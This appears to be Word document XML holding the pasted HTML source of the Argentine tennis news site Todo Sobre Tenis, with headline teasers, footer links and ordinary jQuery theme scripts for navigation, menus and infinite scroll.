    <w:p w14:paraId="43D0F1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41CFFE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"http://todosobretenis.com/wp-content/uploads/2020/01/rio-de-janeiro-2020-centre-court-400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2020/01/rio-de-janeiro-2020-centre-court-300x180.jpg 300w, http://todosobretenis.com/wp-content/uploads/2020/01/rio-de-janeiro-2020-centre-court-768x461.jpg 768w, http://todosobretenis.com/wp-content/uploads/2020/01/rio-de-janeiro-2020-centre-court-590x354.jpg 590w, http://todosobretenis.com/wp-content/uploads/2020/01/rio-de-janeiro-2020-centre-court.jpg 1000w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636CD2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400px) 100vw, 400px" / &gt; &lt; img width = "80"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D964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0EE7A5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"http://todosobretenis.com/wp-content/uploads/2020/01/rio-de-janeiro-2020-centre-court-80x80.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B56C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"mvp-mob-img lazy wp-post-image"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3606A7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3859467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"http://todosobretenis.com/wp-content/uploads/2020/01/rio-de-janeiro-2020-centre-court-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2020/01/rio-de-janeiro-2020-centre-court-150x150.jpg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F13CE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/div&gt;&lt;!--mvp-widget-feat2-right-img--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BAB6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"mvp-widget-feat2-right-text left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEE75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020032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0724D43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AEE29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Noticias &lt; /span&gt;&lt;span class="mvp-cd-date left relative"&gt;dÃ­as atras&lt;/span &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCA80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B632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4B0BC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La ATP probarÃ¡ la revisiÃ³ n electrÃ³ nica en arcilla &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B48AC8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/div&gt;&lt;!--mvp-widget-feat2-right-text--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0F10D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/div&gt;&lt;!--mvp-widget-feat2-right-cont--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03057CF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049700E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/div&gt;&lt;!--mvp-widget-feat2-right--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300B094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/div&gt;&lt;!--mvp-widget-feat2-main--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326F7A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/div&gt;&lt;!--mvp-widget-feat2-in--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CE322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"mvp-widget-feat2-side left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7668175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2545A2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"mvp-widget-feat2-side-ad left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4913FD4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EE9A9C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"mvp-ad-label" &gt; Anuncio &lt; /span&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0523D8B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strong &gt; &lt; a href = "www.terromekioscos.com.ar" &gt; &lt; img class = "aligncenter wp-image-31118 size-large"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3EBE8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"http://todosobretenis.com/wp-content/uploads/2021/03/GRAF-6-FEED-1024x1024.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411F07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5E67BD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width = "300"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDB287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"250" / &gt; &lt; /a&gt;&lt;/strong &gt; &lt; /div&gt;&lt;!--mvp-widget-feat2-side-ad--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAC083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"mvp-widget-feat2-side-list left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C4F0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6398E5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 left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591690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1A7B4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"http://todosobretenis.com/farah-suspendido-provisionalmente-por-la-itf/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CED0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7E13E87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CCA12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4F458F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A9293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2426144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3E487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513CF9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B3245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429C076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76D5F0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"http://todosobretenis.com/wp-content/uploads/2020/01/FARAH-80x80.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0876AF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4C28DA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564221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"http://todosobretenis.com/wp-content/uploads/2020/01/FARAH-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2020/01/FARAH-150x150.jpg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42198F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69928E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366F43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58D51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796B793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B176D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3CBFA60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F5027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Noticias &lt; /span&gt;&lt;span class="mvp-cd-date left relative"&gt;dÃ­as atras&lt;/span &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611254E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75025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78C6AA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Farah,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788B7E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suspendido provisionalmente por la ITF &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8E78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66A99BE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13CED1C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00525F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7318A3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1336BB3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"http://todosobretenis.com/trungelliti-no-se-si-es-para-aplaudir-lo-de-kicker-hace-tiempo-que-era-el-momento-de-aceptar-los-errores-en-vez-de-ensuciar-gente/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B85AC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7C7FA0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74C3C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52C51C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ED8A6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0883D62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4BA406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38455A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7AAEB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5318860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6EDAAB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src = "http://todosobretenis.com/wp-content/uploads/2020/01/trungelliti-es1-articleLarge-80x80.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E51D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51BB26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13C9AEE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"http://todosobretenis.com/wp-content/uploads/2020/01/trungelliti-es1-articleLarge-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2020/01/trungelliti-es1-articleLarge-150x150.jpg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4774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3F535F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7C8B03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C1275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6B4129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DD0E2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1965E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0A97F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Declaraciones &lt; /span&gt;&lt;span class="mvp-cd-date left relative"&gt;dÃ­as atras&lt;/span &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117D22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89A67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2682615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Trungelliti : &amp; #8220;No se si es para aplaudir lo de Kicker. Hace tiempo que era el momento de aceptar los errores en vez de ensuciar gente&amp;# 8221;. &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DC07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7E1A0B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484878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1F3E459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3300F92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4763A0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"http://todosobretenis.com/record-de-premios-en-el-australian-open-2020/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540CF7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rel = "bookmark" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108EBE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F28171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"mvp-feat1-list-cont left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500BD71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147EE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"mvp-feat1-list-out relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8D71A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04E461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"mvp-feat1-list-img left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E30D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27ACC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img width = "80"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0728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height = "80"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B13A3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"http://todosobretenis.com/wp-content/uploads/2020/01/trofeo-80x80.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1211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"attachment-mvp-small-thumb size-mvp-small-thumb wp-post-image"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332853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""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D14F25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srcset = "http://todosobretenis.com/wp-content/uploads/2020/01/trofeo-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2020/01/trofeo-150x150.jpg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A185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sizes = "(max-width: 80px) 100vw, 80px" / &gt; &lt; /div&gt;&lt;!--mvp-feat1-list-img--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7D7C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"mvp-feat1-list-in" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2CDCE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322FB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"mvp-feat1-list-text" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200A0F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D08AAF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"mvp-cat-date-wrap left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1094231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E1232B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"mvp-cd-cat left relative" &gt; Australian Open &lt; /span&gt;&lt;span class="mvp-cd-date left relative"&gt;dÃ­as atras&lt;/span &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B318E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7393D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/div&gt;&lt;!--mvp-cat-date-wrap--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F1C7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h2 &gt; RÃ© cord de premios en el Australian Open 2020 &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7E94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/div&gt;&lt;!--mvp-feat1-list-text--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42054C5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/div&gt;&lt;!--mvp-feat1-list-in--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604D9E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/div&gt;&lt;!--mvp-feat1-list-out--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC10E9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/div&gt;&lt;!--mvp-feat1-list-cont--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355937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3ABFA7B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/div&gt;&lt;!--mvp-feat1-list--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6592004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"http://todosobretenis.com/tag/porsiteloperdiste/" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D228E9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1C54A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"mvp-widget-feat2-side-more-but left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C3AAC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57A927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span class = "mvp-widget-feat2-side-more" &gt; MÃ¡ s POR SI TE LO PERDISTE &lt; /span&gt;&lt;i class="fa fa-long-arrow-right" aria-hidden="true"&gt;&lt;/i &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A50DB3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AF6584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/div&gt;&lt;!--mvp-widget-feat2-side-more-but--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A61F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/a&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B15F4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/div&gt;&lt;!--mvp-widget-feat2-side-list--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0446A31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/div&gt;&lt;!--mvp-widget-feat2-side--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EBA3A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/div&gt;&lt;!--mvp-widget-feat2-out--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF18ED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/div&gt;&lt;!--mvp-widget-feat2-wrap--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140193CB" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B8F838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BB58F0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/div&gt;&lt;/section &gt; &lt; /div&gt;&lt;!--mvp-home-widget-wrap--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3D20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/div&gt;&lt;!--mvp-main-body-wrap--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57171B7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footer id = "mvp-foot-wrap"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8668D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3B7015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5E3BE7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"mvp-foot-top"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0E4D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48B538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B43B5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"mvp-main-box" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F989B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3CA25B1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"mvp-foot-logo"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8E521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5DEFD4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4BFFE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 href = "http://todosobretenis.com/" &gt; &lt; img src = "http://todosobretenis.com/wp-content/uploads/2019/01/TST-3-1.png"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A15FB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alt = "Todo Sobre Tenis"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE0E9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data - rjs = "2" / &gt; &lt; /a&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586543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/div&gt;&lt;!--mvp-foot-logo--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC8CD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"mvp-foot-soc"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156FCC2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7CF70EB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2CFC5E9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ul class = "mvp-foot-soc-list left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C4C3A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F92DB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&gt; &lt; a href = "http://facebook.com/todosobretenis"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2008E92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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E638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"fa fa-facebook fa-2" &gt; &lt; /a&gt;&lt;/li &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2253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EE973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&gt; &lt; a href = "https://twitter.com/Tsobretenis"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0C11F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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531A9ED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"fa fa-twitter fa-2" &gt; &lt; /a&gt;&lt;/li &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4CF4E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65CF8E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li &gt; &lt; a href = "https://www.instagram.com/todosobretenis/?hl=es"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C4558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target = "_blank"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021135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"fa fa-instagram fa-2" &gt; &lt; /a&gt;&lt;/li &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693FDC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204A7F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/ul&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AD77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/div&gt;&lt;!--mvp-foot-soc--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CEDE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"mvp-foot-menu-wrap"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F32A6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15370D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C03275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div id = "mvp-foot-menu"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2009E49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36934B8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4BC619C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/div&gt;&lt;!--mvp-foot-menu--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D761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/div&gt;&lt;!--mvp-foot-menu-wrap--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B9AC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/div&gt;&lt;!--mvp-main-box--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1DD6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/div&gt;&lt;!--mvp-foot-top--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBB8D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"mvp-foot-bot"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3938D12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53BC31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5B9BED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"mvp-main-box" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DBE59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1C04ED9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id = "mvp-foot-copy"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041B71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class = "left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEA9FC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6300F7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p &gt; 2012 - 2020 Todo Sobre Tenis - Todos los derechos reservados. &lt; /p&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3712926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/div&gt;&lt;!--mvp-foot-copy--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E883E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/div&gt;&lt;!--mvp-main-box--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC8471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/div&gt;&lt;!--mvp-foot-bot--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5BCED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/footer&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0619E7C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/div&gt;&lt;!--mvp-site-main--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADD1A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/div&gt;&lt;!--mvp-site-wall--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F581B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/div&gt;&lt;!--mvp-site--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722BAE1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"mvp-fly-top back-to-top" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C1AE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7159B6D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i class = "fa fa-angle-up fa-3" &gt; &lt; /i&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C9488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/div&gt;&lt;!--mvp-fly-top--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F1244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div class = "mvp-fly-fade mvp-fly-but-click" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1308EC6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86282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/div&gt;&lt;!--mvp-fly-fade--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563C6E2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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675AD4A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'http://todosobretenis.com/wp-content/themes/zox-news/js/mvpcustom.js?ver=4.9.18' &gt; &lt; /script&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229D595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 &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09787748" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D84CC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jQuery(document).ready(function($) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA5AE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$(window).load(function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611ABB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var leaderHeight = $("#mvp-leader-wrap").outerHeight();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598B4C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var logoHeight = $("#mvp-main-nav-top").outerHeight();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFD93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var botHeight = $("#mvp-main-nav-bot").outerHeight();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E156D6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var navHeight = $("#mvp-main-head-wrap").outerHeight();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2712705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var headerHeight = navHeight + leaderHeight;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096D943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var aboveNav = leaderHeight + logoHeight;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDC32E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var totalHeight = logoHeight + botHeight;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599902A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var previousScroll = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E08D3B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$(window).scroll(function(event) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AEA2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var scroll = $(this).scrollTop();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D95D5E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if ($(window).scrollTop() &gt; aboveNav) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683C5FB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$("#mvp-main-nav-top").addClass("mvp-nav-small");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F30533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$("#mvp-main-nav-bot").css("margin-top", logoHeight);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF5EC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} else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147644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$("#mvp-main-nav-top").removeClass("mvp-nav-small");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18373A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$("#mvp-main-nav-bot").css("margin-top", "0");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C79E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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2749C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if ($(window).scrollTop() &gt; headerHeight) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70460C9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$("#mvp-main-nav-top").addClass("mvp-fixed");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5CF62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$("#mvp-main-nav-bot").addClass("mvp-fixed1");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5B601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$("#mvp-main-body-wrap").css("margin-top", totalHeight);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B819E0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$("#mvp-main-nav-top").addClass("mvp-fixed-shadow");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269961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$(".mvp-fly-top").addClass("mvp-to-top");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65373F4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if (scroll &lt; previousScroll) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1383ABB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    $("#mvp-main-nav-bot").addClass("mvp-fixed2");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5F36F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    $("#mvp-main-nav-top").removeClass("mvp-fixed-shadow");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CB7C8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} else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017499F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    $("#mvp-main-nav-bot").removeClass("mvp-fixed2");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714258B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    $("#mvp-main-nav-top").addClass("mvp-fixed-shadow");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1951433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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8D3E5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} else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9E99B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$("#mvp-main-nav-top").removeClass("mvp-fixed");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757C5E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$("#mvp-main-nav-bot").removeClass("mvp-fixed1");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F51475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$("#mvp-main-nav-bot").removeClass("mvp-fixed2");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2BA26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$("#mvp-main-body-wrap").css("margin-top", "0");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2102780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$("#mvp-main-nav-top").removeClass("mvp-fixed-shadow");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C27A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    $(".mvp-fly-top").removeClass("mvp-to-top");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDDC80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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604FD13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previousScroll = scroll;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711A23E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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E0A84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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA5087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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094247B9" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EC6482B" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27CB69C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jQuery(document).ready(function($) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A6783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// Mobile Social Buttons More</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5EF6A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$(window).load(function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182842C0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$(".mvp-soc-mob-right").on("click", function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9585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$("#mvp-soc-mob-wrap").toggleClass("mvp-soc-mob-more");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122CCA5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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5A5A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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345BED0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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A025B7" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BD3BBF7" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74DECE7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jQuery(document).ready(function($) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A2AB7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$(".menu-item-has-children a").click(function(event) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55994CD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event.stopPropagation();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7525FF6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location.href = this.href;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC3820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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605F691B" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47501D9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$(".menu-item-has-children").click(function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678C934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$(this).addClass("toggled");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FA1D8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if ($(".menu-item-has-children").hasClass("toggled")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144C642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$(this).children("ul").toggle();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AAA29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$(".mvp-fly-nav-menu").getNiceScroll().resize();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2BD80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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0AD98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$(this).toggleClass("tog-minus");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E482C9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return false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E2A1A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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E612C02" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50E2317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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                                                            // Main Menu Scroll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1090EC9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$(window).load(function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D20DF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$(".mvp-fly-nav-menu").niceScroll({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6E88C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cursorcolor: "#888",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E82488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cursorwidth: 7,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672473C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cursorborder: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7A56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zindex: 999999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C66E1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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EB85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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1379FED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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A325C5D" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="090E48F6" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0411AB6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jQuery(document).ready(function($) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EA7F4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$(".infinite-content").infinitescroll({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23221C0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navSelector: ".mvp-nav-links",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9A838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nextSelector: ".mvp-nav-links a:first",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B487F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itemSelector: ".infinite-post",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D1ECBA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errorCallback: function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107339B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$(".mvp-inf-more-but").css("display", "none")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7915E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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5349A1F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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD719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$(window).unbind(".infscr");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EE659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$(".mvp-inf-more-but").click(function() {</w:t>
      </w:r>
